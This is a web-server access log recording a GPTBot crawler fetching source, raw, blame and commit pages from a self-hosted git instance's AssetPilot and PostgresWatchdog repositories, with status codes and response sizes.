"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/main.cpp" -[17/Feb/2026:13:51:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 3] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:13:51:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 3] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:13:52:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 11539] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" -[17/Feb/2026:13:52:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 11552] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" -[17/Feb/2026:13:52:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 11537] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" -[17/Feb/2026:13:52:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 13369] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app" -[17/Feb/2026:13:52:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 4934] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:13:52:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10983] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:52:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/main.cpp" [Client 74.7.227.38] [Length 9871] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/main.cpp" -[17/Feb/2026:13:52:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/main.cpp" [Client 74.7.227.38] [Length 3799] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/main.cpp" -[17/Feb/2026:13:52:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/main.cpp" [Client 74.7.227.38] [Length 15911] [Gzip 8.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/main.cpp" -[17/Feb/2026:13:52:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libstdc++-6.dll" [Client 74.7.227.38] [Length 10874] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog" -[17/Feb/2026:13:52:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py.claude" [Client 74.7.227.38] [Length 15307] [Gzip 4.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app" -[17/Feb/2026:13:52:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 257] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:13:52:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 277] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:13:52:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 255] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:13:52:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 2169] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/models.py" -[17/Feb/2026:13:52:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" -[17/Feb/2026:13:52:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10933] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" -[17/Feb/2026:13:52:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9974] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" -[17/Feb/2026:13:52:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 287] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" -[17/Feb/2026:13:52:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 10944] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:52:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libstdc++-6.dll?display=rendered" [Client 74.7.227.38] [Length 10881] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libstdc++-6.dll" -[17/Feb/2026:13:52:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py.claude" [Client 74.7.227.38] [Length 15545] [Gzip 9.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py.claude" -[17/Feb/2026:13:52:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libstdc++-6.dll" [Client 74.7.227.38] [Length 2464009] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libstdc++-6.dll" -[17/Feb/2026:13:52:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libstdc++-6.dll" [Client 74.7.227.38] [Length 4330015] [Gzip 20.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libstdc++-6.dll" -[17/Feb/2026:13:52:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py.claude" [Client 74.7.227.38] [Length 5547] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py.claude" -[17/Feb/2026:13:52:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 9958] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:13:52:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 9928] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:13:52:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 11560] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" -[17/Feb/2026:13:52:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 10422] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:13:52:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 10419] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:13:52:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 880569] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -[17/Feb/2026:13:52:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 10195] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -[17/Feb/2026:13:52:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 2009109] [Gzip 22.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -[17/Feb/2026:13:52:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 10426] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:13:52:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor" [Client 74.7.227.38] [Length 10533] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor" -[17/Feb/2026:13:52:30 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor" -[17/Feb/2026:13:52:30 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor" -[17/Feb/2026:13:52:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog" [Client 74.7.227.38] [Length 84415] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" -[17/Feb/2026:13:52:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 10422] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:13:52:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:13:52:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor" [Client 74.7.227.38] [Length 10529] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor" -[17/Feb/2026:13:52:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor" [Client 74.7.227.38] [Length 10340] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor" -[17/Feb/2026:13:52:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog" [Client 74.7.227.38] [Length 84458] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" -[17/Feb/2026:13:52:35 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog" -[17/Feb/2026:13:52:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" [Client 74.7.227.38] [Length 18398] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" -[17/Feb/2026:13:52:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" [Client 74.7.227.38] [Length 9882] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" -[17/Feb/2026:13:52:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor" [Client 74.7.227.38] [Length 12810] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" -[17/Feb/2026:13:52:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.html" [Client 74.7.227.38] [Length 23739] [Gzip 11.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.html" -[17/Feb/2026:13:52:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libstdc++-6.dll" [Client 74.7.227.38] [Length 10846] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog" -[17/Feb/2026:13:52:38 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] 